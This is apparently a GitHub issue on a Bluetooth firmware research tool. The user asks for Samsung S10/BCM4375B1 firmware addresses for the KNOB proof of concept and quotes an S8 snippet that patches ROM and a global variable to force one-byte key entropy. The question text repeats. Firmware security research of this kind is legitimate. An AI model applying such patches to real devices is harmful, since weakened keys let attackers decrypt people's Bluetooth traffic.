Open slowm0ve opened 7 months ago
Hi!
Thank you so much for your tremendous work!
I am trying to experiment with KNOB PoC using Samsung S10 and I found no examples for this hardware, specifically KNOB PoC.
Could you please tell me which addresses need to be specified to change the key entropy value for Samsung S10/BCM4375B1?
Here is the extract from PoC from S8:
patch = asm("mov r2, #0x1", vma=0x530F6) # connection struct key entropy internalblue.patchRom(Address(**0x530F6**), patch) # modify global variable for own setting internalblue.writeMem(**0x255E8F**, b'\x01') # global key entropy
Hi!
Thank you so much for your tremendous work!
I am trying to experiment with KNOB PoC using Samsung S10 and I found no examples for this hardware, specifically KNOB PoC.
Could you please tell me which addresses need to be specified to change the key entropy value for Samsung S10/BCM4375B1?
Here is the extract from PoC from S8: